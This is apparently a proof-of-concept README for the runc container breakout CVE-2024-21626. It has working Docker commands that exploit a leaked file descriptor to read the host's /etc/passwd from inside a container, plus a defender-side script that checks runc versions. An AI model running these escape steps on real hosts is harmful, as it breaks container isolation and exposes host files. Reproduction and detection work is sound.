
CVE-2024-21626 PoC — runc container breakout through process.cwd trickery and leaked fds

Associated vulnerability

Title: runc container breakout through process.cwd trickery and leaked fds (CVE-2024-21626)

Description: runc is a CLI tool for spawning and running containers on Linux according to the OCI specification. In runc 1.1.11 and earlier, due to an internal file descriptor leak, an attacker could cause a newly-spawned container process (from runc exec) to have a working directory in the host filesystem namespace, allowing for a container escape by giving access to the host filesystem ("attack 2"). The same attack could be used by a malicious image to allow a container process to gain access to the host filesystem through runc run ("attack 1"). Variants of attacks 1 and 2 could also be used to overwrite semi-arbitrary host binaries, allowing for complete container escapes ("attack 3a" and "attack 3b"). runc 1.1.12 includes patches for this issue.

README
## about

Steps to reproduce

Ensure the kernel is new enough to provide `openat2` (e.g. `5.4`, `4.19`, ...), which you can confirm by looking for it in `/proc/kallsyms`, and that runc is in the affected range `v1.0.0-rc93 <= runc <= 1.1.11`:

```
$ grep openat2 /proc/kallsyms
ffffffffa64290d0 T __pfx___audit_openat2_how
ffffffffa64290e0 T __audit_openat2_how
ffffffffa666de90 t __pfx_do_sys_openat2
ffffffffa666dea0 t do_sys_openat2
ffffffffa666e020 t __pfx___do_sys_openat2
ffffffffa666e030 t __do_sys_openat2
ffffffffa666e150 T __pfx___x64_sys_openat2
ffffffffa666e160 T __x64_sys_openat2
ffffffffa666e190 T __pfx___ia32_sys_openat2
ffffffffa666e1a0 T __ia32_sys_openat2
ffffffffa69871e0 T __pfx_io_openat2_prep
ffffffffa69871f0 T io_openat2_prep
ffffffffa6987280 T __pfx_io_openat2
ffffffffa6987290 T io_openat2
ffffffffa863d1e0 d event_exit__openat2
ffffffffa863d260 d event_enter__openat2
ffffffffa863d2e0 d __syscall_meta__openat2
ffffffffa863d320 d args__openat2
ffffffffa863d340 d types__openat2
ffffffffa8affb48 d __event_exit__openat2
ffffffffa8affb50 d __event_enter__openat2
ffffffffa8b02b18 d __p_syscall_meta__openat2
ffffffffa8b056f0 d _eil_addr___ia32_sys_openat2
ffffffffa8b05700 d _eil_addr___x64_sys_openat2
```

Read a host file from a fresh container (`docker run` with `-w /proc/self/fd/N`, trying each fd number in turn):

```
$ tail -n1 /etc/passwd
gnome-initial-setup:x:126:65534::/run/gnome-initial-setup/:/bin/false
$ seq 10 | while read line;do docker run --rm -w /proc/self/fd/$line ubuntu tail -n1 ../../../../../etc/passwd |& grep -Ev Error ; done
gnome-initial-setup:x:126:65534::/run/gnome-initial-setup/:/bin/false
```

Find the leaked fd number (only the container whose `-w` hits the leaked fd stays up):

```
$ seq 10 | while read line;do docker run --rm -w /proc/self/fd/$line -tid --name s-$line ubuntu   ; done
$ docker ps -a | grep -P 's-\d$'
c171e8ac9a1a  ubuntu    "bash"  About a minute ago   Up About a minute  s-7
```

The number is 7 on my machine; then exec into an already running container:

```
$ docker exec -ti -w /proc/self/fd/7 xxxxx tail -n1 /proc/self/cwd/../../../../../etc/passwd
gnome-initial-setup:x:126:65534::/run/gnome-initial-setup/:/bin/false
```

After replacing runc, the same exec is refused:

```
$ cp runc.amd64 /usr/bin/runc
$ docker exec -ti -w /proc/self/fd/7 xxxxx tail -n1 /proc/self/cwd/../../../../../etc/passwd
OCI runtime exec failed: exec failed: unable to start container process: chdir to cwd ("/proc/self/fd/7") set in config.json failed: not a directory: unknown: Are you trying to mount a directory onto a file (or vice-versa)? Check if the specified host path exists and is the expected type
```
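As an added defender-side check that is not part of this PoC: a POSIX shell script that classifies a runc version string against the affected range stated above (`v1.0.0-rc93 <= runc <= 1.1.11`, fixed in 1.1.12) and flags the `/proc/self/fd/N` working-directory pattern the PoC passes to `-w`; the function names are assumptions of this example.

```shell
#!/bin/sh
# Added defender-side helper, not part of the original PoC. Function names are
# this example's own. Affected range taken from the advisory text above:
# v1.0.0-rc93 <= runc <= 1.1.11, fixed in runc 1.1.12.

# parse_runc_version TEXT -> prints e.g. "1.1.11" from `runc --version` output.
parse_runc_version() {
  first="$(printf '%s\n' "$1" | head -n1)"   # e.g. "runc version 1.1.11+dev"
  first="${first##* }"                        # last whitespace-delimited word
  printf '%s\n' "${first%%+*}"                # drop any "+dev"-style suffix
}

# runc_vulnerable VERSION -> prints "vulnerable" or "not_vulnerable";
# exit status 0 when vulnerable. Accepts "v1.0.0-rc93", "1.1.0-rc.1", "1.1.11".
runc_vulnerable() {
  v="${1#v}"; rc=""
  case "$v" in
    *-rc*) rc="${v##*-rc}"; rc="${rc#.}"; v="${v%%-rc*}" ;;
  esac
  IFS=. ; set -- $v ; unset IFS              # split "1.1.11" into 1 1 11
  major="${1:-0}"; minor="${2:-0}"; patch="${3:-0}"
  code=$((major * 1000000 + minor * 1000 + patch))   # orderable integer
  if [ "$code" -lt 1000000 ]; then echo not_vulnerable; return 1; fi  # pre-1.0.0
  if [ "$code" -eq 1000000 ] && [ -n "$rc" ] && [ "$rc" -lt 93 ]; then
    echo not_vulnerable; return 1                                     # 1.0.0-rc1..rc92
  fi
  if [ "$code" -gt 1001011 ]; then echo not_vulnerable; return 1; fi  # 1.1.12 and later
  echo vulnerable; return 0
}

# suspicious_workdir PATH -> exit 0 if the working directory names a /proc fd
# entry, the pattern this PoC supplies via `docker run -w` / `docker exec -w`.
suspicious_workdir() {
  case "$1" in
    /proc/self/fd/*|/proc/thread-self/fd/*|/proc/[0-9]*/fd/*) return 0 ;;
    *) return 1 ;;
  esac
}

# Report on the locally installed runc, if there is one on PATH.
if command -v runc >/dev/null 2>&1; then
  ver="$(parse_runc_version "$(runc --version 2>/dev/null)")"
  echo "runc $ver: $(runc_vulnerable "$ver")"
fi
```

`suspicious_workdir` can be run over the `WorkingDir` values from `docker inspect` to spot containers created with the PoC's `-w` argument.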